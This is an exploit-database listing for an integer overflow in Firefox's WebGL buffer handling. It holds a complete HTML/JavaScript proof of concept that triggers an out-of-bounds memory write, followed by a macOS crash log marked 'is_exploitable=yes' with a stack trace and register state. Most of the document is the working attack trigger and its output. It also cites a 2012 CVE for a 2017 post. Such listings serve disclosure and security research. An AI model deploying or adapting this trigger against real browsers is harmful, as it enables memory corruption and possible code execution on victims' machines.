Mozilla Firefox WebGL Proof Of Concept

Date: 15 Feb 2017 | Reported by: Bikash Dash | Type: packetstorm | Source: packetstormsecurity.com

Integer overflow in Mozilla Firefox WebGL syste

Code
```
# Exploit Title: Integer overflow happens WebGL system in Mozilla Firefox
# Date: 15-02-2017
# Software Link: https://www.mozilla.org/en-US/firefox/new/
# Exploit Author: (Originally Found by Google Project 0 team) Bikash Dash
# Tested On: MAC OS x86
# Website: http://vulnerableghost.com/
# CVE: CVE-2012-5835
# Category: webapps (Mozilla)
<html>
<head>
<script>
// Create a WebGL context and bind a fresh array buffer.
var gl = document.createElement('canvas').getContext('experimental-webgl');
var buf = gl.createBuffer();
gl.bindBuffer(gl.ARRAY_BUFFER, buf);
var magic = 0x12345678;
// Size the buffer to magic + 1 bytes, so offset `magic` is its last byte.
gl.bufferData(gl.ARRAY_BUFFER, new Uint8Array(magic + 1), gl.STATIC_DRAW);
// Re-specify the buffer with a size of 2^32, which does not fit in 32 bits.
gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW);
// Write one byte at offset `magic`; the crash report below shows a write
// to address 0x12345678, the same value.
gl.bufferSubData(gl.ARRAY_BUFFER, magic, new Uint8Array(1));
</script>
</head>
</html>
```

Crash Information:

```
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movb %al,(%rdi):instruction_address=0x00007fff92c82a41:access_type=write:access_address=0x0000000012345678:
Crash accessing invalid address. Consider running it again with libgmalloc(3) to see if the log changes.
Test case was b291.html


Process: firefox [3732]
Path: /Applications/Firefox.app/Contents/MacOS/firefox
Identifier: firefox
Version: ??? (???)
Code Type: X86-64 (Native)
Parent Process: exc_handler [3731]

Date/Time: 2017-02-15 10:44:52.818 +0300
OS Version: Mac OS X 10.8.1 (12B19)
Report Version: 9

Crashed Thread: 0 Dispatch queue: com.apple.main-thread

Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000012345678

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 libsystem_c.dylib 0x00007fff92c82a41 memmove$VARIANT$sse42 + 57
1 GLEngine 0x000000010cfa9982 glBufferSubData_Exec + 856
2 XUL 0x00000001020df955 0x10111a000 + 16537941
3 XUL 0x000000010257424b 0x10111a000 + 21340747
4 XUL 0x0000000102564622 0x10111a000 + 21276194
5 XUL 0x0000000102573ae2 0x10111a000 + 21338850
6 XUL 0x0000000102573ce9 0x10111a000 + 21339369
7 XUL 0x0000000102573fe5 0x10111a000 + 21340133
8 XUL 0x00000001024f2d2d 0x10111a000 + 20811053
9 XUL 0x00000001024f2e5b JS_EvaluateUCScriptForPrincipalsVersionOrigin + 107
10 XUL 0x000000010182121d 0x10111a000 + 7369245
11 XUL 0x00000001015ef000 0x10111a000 + 5066752
12 XUL 0x00000001015f0538 0x10111a000 + 5072184
13 XUL 0x00000001015f117a 0x10111a000 + 5075322
14 XUL 0x00000001015ee4bd 0x10111a000 + 5063869
15 XUL 0x00000001019a41b6 0x10111a000 + 8954294
16 XUL 0x00000001019a6285 0x10111a000 + 8962693
17 XUL 0x00000001019aa94d 0x10111a000 + 8980813
18 XUL 0x00000001021324f3 0x10111a000 + 16876787
19 XUL 0x00000001020f1c0e 0x10111a000 + 16612366
20 XUL 0x0000000101f5b009 0x10111a000 + 14946313
21 XUL 0x0000000101f1f4bf 0x10111a000 + 14701759
22 com.apple.CoreFoundation 0x00007fff917fd841 __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
23 com.apple.CoreFoundation 0x00007fff917fd165 __CFRunLoopDoSources0 + 245
24 com.apple.CoreFoundation 0x00007fff918204e5 __CFRunLoopRun + 789
25 com.apple.CoreFoundation 0x00007fff9181fdd2 CFRunLoopRunSpecific + 290
26 com.apple.HIToolbox 0x00007fff8f6f3774 RunCurrentEventLoopInMode + 209
27 com.apple.HIToolbox 0x00007fff8f6f3512 ReceiveNextEventCommon + 356
28 com.apple.HIToolbox 0x00007fff8f6f33a3 BlockUntilNextEventMatchingListInMode + 62
29 com.apple.AppKit 0x00007fff96591fa3 _DPSNextEvent + 685
30 com.apple.AppKit 0x00007fff96591862 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
31 XUL 0x0000000101f1e942 0x10111a000 + 14698818
32 com.apple.AppKit 0x00007fff96588c03 -[NSApplication run] + 517
33 XUL 0x0000000101f1ed2d 0x10111a000 + 14699821
34 XUL 0x0000000101d867b4 0x10111a000 + 13027252
35 XUL 0x0000000101121193 0x10111a000 + 29075
36 XUL 0x0000000101125fbb 0x10111a000 + 49083
37 XUL 0x00000001011264c3 XRE_main + 307
38 org.mozilla.firefox 0x0000000100001e15 0x100000000 + 7701
39 org.mozilla.firefox 0x0000000100001584 start + 52

Thread 0 crashed with X86 Thread State (64-bit):
rax: 0xffffffff0b4f3400 rbx: 0x000000011506ac00 rcx: 0x0000000000000000 rdx: 0x0000000000000001
rdi: 0x0000000012345678 rsi: 0x0000000106e521d1 rbp: 0x00007fff5fbfb9d0 rsp: 0x00007fff5fbfb9d0
r8: 0x0000000000000000 r9: 0x00007fff5fbfb970 r10: 0x000000010a50c5b0 r11: 0x0000000012345678
r12: 0x0000000012345678 r13: 0x0000000113607b68 r14: 0x0000000113607b40 r15: 0x0000000000000001
rip: 0x00007fff92c82a41 rfl: 0x0000000000010206 cr2: 0x0000000012345678
Logical CPU: 2
```

Vulners AI Score: 0.2 (Low risk) | EPSS: 0.08528